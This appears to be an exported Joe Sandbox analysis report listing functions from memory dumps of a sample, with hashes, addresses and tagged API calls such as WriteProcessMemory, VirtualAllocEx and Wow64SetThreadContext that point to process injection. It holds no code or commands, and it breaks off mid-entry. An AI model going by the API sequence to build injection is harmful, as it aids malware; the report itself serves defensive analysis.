Instruction ID: 34507b950e1898b453644b3ee876d92a292a937173861a484455d98f344c1df1
Opcode Fuzzy Hash: 243e3f30b76f5f52f5a15720a3fd2aa36293befa56067d3b35ff52b31011a0dc
Instruction Fuzzy Hash: 4D5199B1D1065A8FDF11CFA8C8957EEBBF1EF48310F148129E855EB280DB7499828B81

Function 07190AD0 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(?,?,?), ref: 07190C15

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 92b7b3c2801cfb4e51cd2520e3ed0948de9c85c1c478ca15d510f4c83e71a220
Instruction ID: 1ada6d9137dbd82579903d75bc9f5e76457998abdc6b01b469b0a88c1a901b94
Opcode Fuzzy Hash: 92b7b3c2801cfb4e51cd2520e3ed0948de9c85c1c478ca15d510f4c83e71a220
Instruction Fuzzy Hash: DB5179B0D1075ACFDF10CFA9C9957AEBBF1EF48310F148529E855E7280DB7899828B81

Function 01831677 Relevance: 1.6, Strings: 1, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 018318CB

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9bd35ae0d904d4fc9882a7f448c00d0da54abbec8bf5be4cc0b93cc8e8038bc7
Instruction ID: fe18ee3c89c57ab43eaae3624313d787c62ba4a3a0c92baeff3a8d25d8849b00
Opcode Fuzzy Hash: 9bd35ae0d904d4fc9882a7f448c00d0da54abbec8bf5be4cc0b93cc8e8038bc7
Instruction Fuzzy Hash: 18E19F34604208CFDB15DFA8D498BADBBF1FF89B14F194169E406DB3A1CA359E45CB81

Function 06DE3500 Relevance: 1.6, Strings: 1, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 06DE3761

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 386156f16de149bc63396c5b9886b2711a57a8f72e6541c77bd1f9282d1df156
Instruction ID: 986cc54c5d06a40e2365cdec239606b079e0cf4f5420a0873d1581b7bdd4709a
Opcode Fuzzy Hash: 386156f16de149bc63396c5b9886b2711a57a8f72e6541c77bd1f9282d1df156
Instruction Fuzzy Hash: A9D16D34A00606CFCB64EF29C484A7AB7F2FF88310B568969D55A9B755DB30FC46CB90

Function 0719E5B2 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0719E648

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a32fad957d60558d82aaeb680eda53027f69e3df022b8fe0a4aa73cdaf344b59
Instruction ID: eddee5ea85ed0afa7aa9e608bec189c29eebee997f3dc49ebe23c7d4c54bcb87
Opcode Fuzzy Hash: a32fad957d60558d82aaeb680eda53027f69e3df022b8fe0a4aa73cdaf344b59
Instruction Fuzzy Hash: 5C215CB69003499FDF10CFA9C981BEEBBF5FF48310F10842AE958A7240D7799545CBA4

Function 0719E5B8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0719E648

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 67c3a76eeb0f5c54b2b54c4ca293cd59a8a8b9bcc87a34a13a7b89dfa64c2f66
Instruction ID: 00749311dcaa1c3f5b4ad61975ed30f5f231b716d2d2c9cf68f0939d47c4f19a
Opcode Fuzzy Hash: 67c3a76eeb0f5c54b2b54c4ca293cd59a8a8b9bcc87a34a13a7b89dfa64c2f66
Instruction Fuzzy Hash: 382127B69003599FDF10CFA9C980BDEBBF5FF48310F10842AE959A7240DB799945CBA4

Function 0719DD92 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0719DE16

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 12e579f4f01a1ff3877693ccefee513418bee1701cf470b1e1142320038cdd55
Instruction ID: 1fab1f20e1b2011f2a9c1b40a40c6a26c379ee5bd6b0a815f368f80e89c8a95b
Opcode Fuzzy Hash: 12e579f4f01a1ff3877693ccefee513418bee1701cf470b1e1142320038cdd55
Instruction Fuzzy Hash: 5C2159B1D003099FDB14DFAAC4817EEBBF4EF48310F14842ED459A7280CB789945CBA4

Function 06DF7260 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DF72DC

Memory Dump Source

Source File: 00000006.00000002.1424159382.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_50201668.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 983b61300a07260d7d980d5d27a99fde558dc865cda3778ca3f407ac922bbf0d
Instruction ID: 12019b5927c66b1d223a2b5aafe40cc8cfc4941cb9c406d439b07984c3333d98
Opcode Fuzzy Hash: 983b61300a07260d7d980d5d27a99fde558dc865cda3778ca3f407ac922bbf0d
Instruction Fuzzy Hash: 82213971D002499FDB24DFAAC880BEEBBF5EF48310F548429E559A7241CB399541CFA5

Function 0719DD98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0719DE16

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 815371ea672698428141b331b8457c052b83f70063bad0429cebed217c9ece80
Instruction ID: b27f674d8f1b63c01fa76de7372e47ab6283ef2cb4b03eec8933b712191f6a81
Opcode Fuzzy Hash: 815371ea672698428141b331b8457c052b83f70063bad0429cebed217c9ece80
Instruction Fuzzy Hash: C62138B1D003099FDB14DFAAC4847EEBBF4EF48310F14842AD559A7280CB789945CFA4

Function 06DF7268 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DF72DC

Memory Dump Source

Source File: 00000006.00000002.1424159382.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_50201668.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 950b42426bf652f8e10131529d9f0196e11722b8185194ae255996b8e407606e
Instruction ID: 547e3917dca2eec13194c39858d300cfcb0b286d33f45c0509fc9e079406659b
Opcode Fuzzy Hash: 950b42426bf652f8e10131529d9f0196e11722b8185194ae255996b8e407606e
Instruction Fuzzy Hash: 42211871D003499FDB24DFAAC440BEEBBF5EF48310F14842AD559A7240CB799541CFA5

Function 06FBD440 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06FBD4B4

Memory Dump Source

Source File: 00000006.00000002.1425157998.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6fb0000_50201668.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cc79c3549b8a56ee48af0ce947782673831776d161f1f9495eae260e73dfb95a
Instruction ID: e9da465a62e26e4f35a23b97a5526f83b6b077b4926e9c0c0b24e546bc4a0bea
Opcode Fuzzy Hash: cc79c3549b8a56ee48af0ce947782673831776d161f1f9495eae260e73dfb95a
Instruction Fuzzy Hash: 8511E371D002489FDB24DFAAC884BEEFBF5FF48210F14842AD519A7250CB79A945CFA5

Function 0719E340 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0719E3B6

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 59a6d4fabc39a2b9e05798d90c71df4566990e12ec1cab9971bf50c850717bd4
Instruction ID: 1afd1428918be0196434d589429a0877e0a1dcdeb6a4080811b3be351ae395ea
Opcode Fuzzy Hash: 59a6d4fabc39a2b9e05798d90c71df4566990e12ec1cab9971bf50c850717bd4
Instruction Fuzzy Hash: 4B115972D002499FDF20DFAAC845BEEBFF5EF48310F148419E955A7250CB359615CBA0

Function 0719E348 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0719E3B6

Memory Dump Source

Source File: 00000006.00000002.1425315700.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7190000_50201668.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d64fa8f2b269c1441195ab5d6bf597ecde6b2318eb948a37b0adcb8d836af83
Instruction ID: 17ed766fd7fad1e717b4f3348859cbd447c140b411e804db51874ed76b2e37de
Opcode Fuzzy Hash: 5d64fa8f2b269c1441195ab5d6bf597ecde6b2318eb948a37b0adcb8d836af83
Instruction Fuzzy Hash: AF1126729003499FDF24DFAAC844BEEBBF5EB48310F14841AE515A7250CB79A545CBA4

Function 06E067D0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

!, xrefs: 06E067E9

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: c02f37950127be98a863554b3c82ea51b1fffa4b1dc8a556f25f93008f298fa6
Instruction ID: 985d609418d80806031be5862a56e3e238666175e6489faa6eba0018d96877b2
Opcode Fuzzy Hash: c02f37950127be98a863554b3c82ea51b1fffa4b1dc8a556f25f93008f298fa6
Instruction Fuzzy Hash: 1BB1D074A05358CFEB61CFA8C948BDDBBF5BB49314F206099D549AB295C3789A88CF40

Function 06E06971 Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

", xrefs: 06E0699D

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 65a60d4c601ca819ac8cf23e6206ce0ed3997c76c953113528634b22e9cff3cd
Instruction ID: 4488e73271e4456b6e3ee63d66103d78554fb9df539856d953ecd9ec076ca625
Opcode Fuzzy Hash: 65a60d4c601ca819ac8cf23e6206ce0ed3997c76c953113528634b22e9cff3cd
Instruction Fuzzy Hash: E3A1D274A05358CFEB61CFA8C948BDDBBF5BB49314F206099D549AB295C3789E88CF40

Function 06EF70A2 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

#, xrefs: 06EF73C7

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: e408fdc73f3c26c144799f0e4b455512147f6d8794203c394af821be842d027c
Instruction ID: d161a4f807d70e080c005c9e0aaf3dca0ba067824549f8097487ac7ec98cfd0b
Opcode Fuzzy Hash: e408fdc73f3c26c144799f0e4b455512147f6d8794203c394af821be842d027c
Instruction Fuzzy Hash: C671F874E14348CFEF90CFA9E844B9ABBF2FB86304F10A069D109AB255D7795985CF41

Function 06EF70B6 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

#, xrefs: 06EF73C7

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 9a497757d27932e14e0f19118b85f3b69d60332c197cbc67357359bef15338e7
Instruction ID: 304eb320f7e233168c5b31ff862bd01beb6dce6f7854d20c97fe3ad6a6fbbabd
Opcode Fuzzy Hash: 9a497757d27932e14e0f19118b85f3b69d60332c197cbc67357359bef15338e7
Instruction Fuzzy Hash: 8F611874E14348CFEF90CFA9E844B99BBF2FB86304F10A0A9D109AB255D7795985CF41

Function 06EF8CF1 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

@, xrefs: 06EF8DA7

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: dd0f5039c4948dd54e686e1b7237937b64534a39fb0fdca7c6d32a2f26847b9b
Instruction ID: 2810e5d850d89b5b8155fd90b120c0b4971a5bba85bbdde9369472ac5c6e969e
Opcode Fuzzy Hash: dd0f5039c4948dd54e686e1b7237937b64534a39fb0fdca7c6d32a2f26847b9b
Instruction Fuzzy Hash: 4D816F78A05228CFEBA0DF68DC54B9AB7B2FB89304F1081EA954DA7344DB345E85CF51

Function 01831C38 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

xX@s[, xrefs: 01831D7C

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID: xX@s[
API String ID: 0-3063195345
Opcode ID: 587061b67b1a33099db63646588aaed71655593eca5a41f93f5236f9336ec5b8
Instruction ID: cbd8b6bf70a9fb7780be57d8f5240d37f116ee06d07aafbc6311058a1ac5909f
Opcode Fuzzy Hash: 587061b67b1a33099db63646588aaed71655593eca5a41f93f5236f9336ec5b8
Instruction Fuzzy Hash: 1941C034B00209CFDB58AB7AD4186AE7BB2FBC6B40B188569D506DB244DF358E438BD1

Function 06EF7CF5 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

%, xrefs: 06EF7E22

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: d8f8e89003778dfca5c675185552c42f1166118c239aa258c243b0ce65af940e
Instruction ID: 3249f852e3ff605a58a3a7ed55fabcbccdd6c53ca01562eef0a1ba5ff3288edf
Opcode Fuzzy Hash: d8f8e89003778dfca5c675185552c42f1166118c239aa258c243b0ce65af940e
Instruction Fuzzy Hash: 2B211578A052088FEF40DFA8E844BDEBBB2FB89318F2051A9C519AB351DA355D49CB50

Function 06FBE428 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06FBE493

Memory Dump Source

Source File: 00000006.00000002.1425157998.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6fb0000_50201668.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 99c8bab156a077cbb9f12b73b38fda7c1da3836124fb25ed00d99f4713cb7b46
Instruction ID: 5d1020ef412df91be7f9e11f0b4c679a69fbb856f6988386af81928f05cda24e
Opcode Fuzzy Hash: 99c8bab156a077cbb9f12b73b38fda7c1da3836124fb25ed00d99f4713cb7b46
Instruction Fuzzy Hash: F6110775D00348DFDB24DFAAC844BDEBBF5EB48320F24841AD555A7250CB79A541CBA4

Function 06EF7B8B Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

3, xrefs: 06EF7BE6

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 7871ab1976031fecd0c4da77865a4dcdfda7fb680d0fcb6ae7806d7f04781847
Instruction ID: 3c25c0cfc975f456861b903cb7295c99d3be9a3062abcd6293d7baefb29a8428
Opcode Fuzzy Hash: 7871ab1976031fecd0c4da77865a4dcdfda7fb680d0fcb6ae7806d7f04781847
Instruction Fuzzy Hash: 27F0D474904219CFDB90DF28D894B9CBBB2FB88704F1081A9C41DA7212DB355E85CF54

Function 06EF7EC2 Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

1, xrefs: 06EF7F11

Memory Dump Source

Source File: 00000006.00000002.1424746130.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ef0000_50201668.jbxd

Similarity

API ID:
String ID: 1
API String ID: 0-2212294583
Opcode ID: a2b24e1f65d530a3d0eab04a430027afa7eea5022cc2ee50f939f71d330a04f7
Instruction ID: f9c3c25a98d4357bcdfcc8cfb9a7c77c72b95252c624493d2d5b92aa6ad371f4
Opcode Fuzzy Hash: a2b24e1f65d530a3d0eab04a430027afa7eea5022cc2ee50f939f71d330a04f7
Instruction Fuzzy Hash: 8DF0C278E05219CFEB64DF68D854B9DB7B2FB88304F1081A9D51AA7340DA349E84CF50

Function 0183421A Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

jjjjjj, xrefs: 01834384

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID: jjjjjj
API String ID: 0-3900813449
Opcode ID: b67ab63c0c5e716ec83210b72eb10923b79c7d5997020c3d620f4f9ba3aca765
Instruction ID: 2e27278876dca7e47612a463909767a325bd405bb03df3354ab611625ffd18ee
Opcode Fuzzy Hash: b67ab63c0c5e716ec83210b72eb10923b79c7d5997020c3d620f4f9ba3aca765
Instruction Fuzzy Hash: 1DC08C0140E388CFCA134A5491E02302F103BE1289B1CC0D6C4818B00BD220C68AA3A1

Function 06DE69E0 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6bd8b36556dbb46d5f6adbb592c796f252c4503f35c7c73d4b20623826d38d
Instruction ID: 5669b5dba2f6ccab9fdf58295150cc4e655fff2ee6396490eae381cb1d51a162
Opcode Fuzzy Hash: 4d6bd8b36556dbb46d5f6adbb592c796f252c4503f35c7c73d4b20623826d38d
Instruction Fuzzy Hash: 36520675E002298FDB64DF68C991BADBBF2BF88300F1541D9E509AB351DA309D81CF61

Function 01832778 Relevance: .5, Instructions: 535COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1ba6c4e205dd0b645ffa99bdf5a0f2fefeb8b0425340cba6275e4718709381
Instruction ID: e8019ecd6305650fed19539fe6a95ada9d8728f9e2919ff74fa4539af4da0448
Opcode Fuzzy Hash: ec1ba6c4e205dd0b645ffa99bdf5a0f2fefeb8b0425340cba6275e4718709381
Instruction Fuzzy Hash: 7042A274A15604CFD310CF09EA88A98BBF2FB84345F5AC199E8158F662D77ADD84CF81

Function 06DE0F40 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63cda3a1baeda63264eb6c40ab86b83636cff0e1aae86f9a6403d74e7980236
Instruction ID: 7ad37fcf5d45dcb453d7a206d8ece12eca6bbf82edb951c1d6fde9f1ffa7cede
Opcode Fuzzy Hash: a63cda3a1baeda63264eb6c40ab86b83636cff0e1aae86f9a6403d74e7980236
Instruction Fuzzy Hash: C1225C35B00209DFDB54EFA9D894A6DB7B2FF88310F148159E906EB3A1CA75EC41CB90

Function 018326A0 Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1244c768c2380196631e8d8e15eec9d7c1b6476f5d97f44f108dac0ea65adb1e
Instruction ID: bbd813c540b0a2ad67bf9a33359f6fe90a050120acaa47985673a009d135ce20
Opcode Fuzzy Hash: 1244c768c2380196631e8d8e15eec9d7c1b6476f5d97f44f108dac0ea65adb1e
Instruction Fuzzy Hash: 3F32B274B15600CFD324CF09EA88A58BBF1FB84345F59C199E8158F662E77ADD88CB81

Function 06DE3E50 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513a475ee1a58844d2221751e075ff9ceab698078c8a0a563eddec7bdd554f13
Instruction ID: 5e7217a9d801d00c25aefdd714ddccbf894c5ccdc5cb6a663e0303283fa7336d
Opcode Fuzzy Hash: 513a475ee1a58844d2221751e075ff9ceab698078c8a0a563eddec7bdd554f13
Instruction Fuzzy Hash: E3125B30A0060A8FDBA4EFA5D894A6EB7F2FF88310F14852DD5469B754DB35EC46CB90

Function 06DE99E8 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7686cd2b867f82254210a9fc1e7119bd97cf29533ffe3d9cc66e1c4d828823d9
Instruction ID: d0d66f347ee769959d53471ab800eb9b549af118f6cd2964e8cbea6b53dd1e9f
Opcode Fuzzy Hash: 7686cd2b867f82254210a9fc1e7119bd97cf29533ffe3d9cc66e1c4d828823d9
Instruction Fuzzy Hash: 7B123934A00219CFCB54EF64C894A9DBBB2FF89300F5185A8E54AAB355DB31ED85CF50

Function 06DE5B08 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a81f3d8a789d7016625efeb2d71ea054b0157d07eebe682a199e3c9b93f2da6
Instruction ID: 363dcb595287fdc2e1376be79f8585d0e0937dbf09455c115daa6efc2a177eb7
Opcode Fuzzy Hash: 7a81f3d8a789d7016625efeb2d71ea054b0157d07eebe682a199e3c9b93f2da6
Instruction Fuzzy Hash: A5F10834A10219CFCB44EFA4D998E9DBBB2FF88304F518159E406AB3A5DB71EC42CB50

Function 06DEA0E0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99a536c8fc259f7d47fb30676740dbe512c53872bba853d544c3ea03c584010
Instruction ID: 40707c78d36674c9f71a0a74ad3f9906616f05ebbb69910f437cff484142b093
Opcode Fuzzy Hash: c99a536c8fc259f7d47fb30676740dbe512c53872bba853d544c3ea03c584010
Instruction Fuzzy Hash: 4DE17434A00209DFCB54EFA4D89499DBBB2FFC9310F548569E416AB364DB35EC46CB90

Function 06D74210 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1423797655.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d70000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d59b38dd7b3f5b514429ba1af3e7068483afba120406449f743ce56a19be0b
Instruction ID: bee4004cb0ff456da5bb4d3a878bd2b4a397e429e596863e5699d70882721dc0
Opcode Fuzzy Hash: 53d59b38dd7b3f5b514429ba1af3e7068483afba120406449f743ce56a19be0b
Instruction Fuzzy Hash: 33F1D270D01208DFDBA9DFA4E4986ADBBF6FF89315F204129E416A7350DB389982CF51

Function 06DE99D8 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424125645.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6de0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ac73be43e84a506623efa8b48b546bd3fe667753b8754e500e4de44462696b
Instruction ID: 029049b2f46584b4d17422db753e2d4f3c55833a76d830d3ca105bd0bca021e6
Opcode Fuzzy Hash: 13ac73be43e84a506623efa8b48b546bd3fe667753b8754e500e4de44462696b
Instruction Fuzzy Hash: B0C13E34A00215CFCB64EF64C894B99BBB2FF89310F5185A8E549AB3A5DB31ED85CF50

Function 06E069AA Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce41ec3083040e61aac8332daccbb89f4af79e88636c12f489428188d8d932b
Instruction ID: 978b5e3d6d3cee57d2d982e148fcc79e41e203ff9e8fb29b81e5caea88f030e8
Opcode Fuzzy Hash: 5ce41ec3083040e61aac8332daccbb89f4af79e88636c12f489428188d8d932b
